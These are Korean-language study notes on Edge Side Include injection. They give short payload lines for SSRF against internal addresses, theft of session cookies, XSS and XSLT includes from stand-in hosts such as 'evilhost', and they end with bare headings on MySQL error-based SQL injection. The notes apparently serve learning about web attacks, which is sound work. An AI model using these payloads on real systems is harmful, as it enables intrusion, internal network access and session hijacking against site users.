스터디7
ESI injection
1. Edge Side Include Injection
html tag와 함께 웹 페이지를 구성 할 수 있는 markup language
https://www.w3.org/TR/esi-lang
ESI Language Specification 1.0
www.w3.org
http://esi-examples.akamai.com/
Weather for <esi:include src="/weather/name?id=$(QUERY_STRING{city_id})" />
Monday:<esi:include src="/weather/week/monday?id=$(QUERY_STRING{city_i
d})"/>
Tuesday:<esi:include src="/weather/week/tuesday?id=$(QUERY_STRING{city_I
d})" />
Edge Side Includes Injection – SSRF
<esi:include src=http://127.0.0.1/server-status/>
<esi:include src=http://internal_domain/server_base_csrf_page/>
-
Edge Side Includes Injection – Session Hijacking
<esi:vars>$(HTTP_COOKIE{PHPSESSID})</esi:vars> <esi:vars>$(HTTP_COOKIE{JSESSIONID})</esi:vars> <esi:vars>$(HTTP_COOKIE{Private_Cookie})</esi:vars>
Edge Side Includes Injection – XSS
<esi:include src=http://hackersite/xss.html/>
Edge Side Includes Injection – XML
<esi:include src="http://evilhost/poc.xml" dca="xslt" stylesheet="http://evilho
st/poc.xsl"/>
error based sql injection
mysql 5.5.5버전
수학적인 연산
1.MySQL Error Based SQL injection Using EXP
실습
2. BIGINT Overflow Error Based SQL Injection in MySQL
실습
